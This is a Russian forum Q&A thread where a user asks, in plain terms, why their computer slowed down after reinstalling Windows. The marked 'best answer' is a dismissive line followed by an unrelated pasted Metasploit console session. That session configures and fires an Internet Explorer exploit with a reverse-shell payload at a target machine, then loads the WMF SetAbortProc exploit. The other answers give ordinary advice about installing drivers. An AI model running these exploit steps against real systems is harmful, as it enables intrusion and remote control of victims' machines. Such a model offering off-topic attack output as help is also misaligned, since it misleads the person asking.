Прочее компьютерное

почему после переустановки винды начал тормозить комп объясните человеческим языком

что объяснить?
Максат Сыздыков
Максат Сыздыков
15 002
Лучший ответ
Ну зачит ОС туповатую установил.
>> show exploits

Exploits
========

Name Description
-------пропущено -----------
windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
windows/browser/ie_createobject Internet Explorer COM CreateObject Code Execution
windows/browser/ie_iscomponentinstalled Internet Explorer isComponentInstalled Overflow
msf > use windows/browser/ms03_020_ie_objecttype
msf exploit(ms03_020_ie_objecttype) > set SRVHOST 10.10.12.206
SRVHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms03_020_ie_objecttype) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(ms03_020_ie_objecttype) > set LHOST 10.10.12.206
LHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > exploit[*] Started reverse handler[*] Using URL: http://10.10.12.206:8080/xPB3Ch32qOgpE6s[*] Server started.[*] Sending exploit to 10.10.12.208:1200...
----пропущено -----

4. Выбираем WMF-сплоит.. .

use windows/browser/ms06_001_wmf_setabortproc

5. Смотрим инфу по нём:

info windows/browser/ms06_001_wmf_setabortproc

Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
Version: 4647
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
hdm <hdm@metasploit.com>
san <san@xfocus.org>
O600KO78RUS <o600ko78rus@unknown.ru>

Available targets:
Id Name
-- ----
0 Windows XP/2003/Vista Automatic

Basic options:
Name Current Setting Required Description
--------------------------------------
SRVHOST 10.0.3.84 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 1220
Avoid: 1 characters

Description:
This module exploits a vulnerability in the GDI library included
with Windows XP and 2003. This vulnerability uses the 'Escape'
metafile function to execute arbitrary code through the SetAbortProc
procedure. This module generates a random WMF record stream for each
request.
тут то все просто
Сергей Швабу
Сергей Швабу
2 472
установи драйвера (дрова) непосредственно для твоего железа МП, видео карта звуковая карта и. т. д
Что бы получить нормальный ответ надо поработать ручками и дать больше информации.
Tol Ad
Tol Ad
301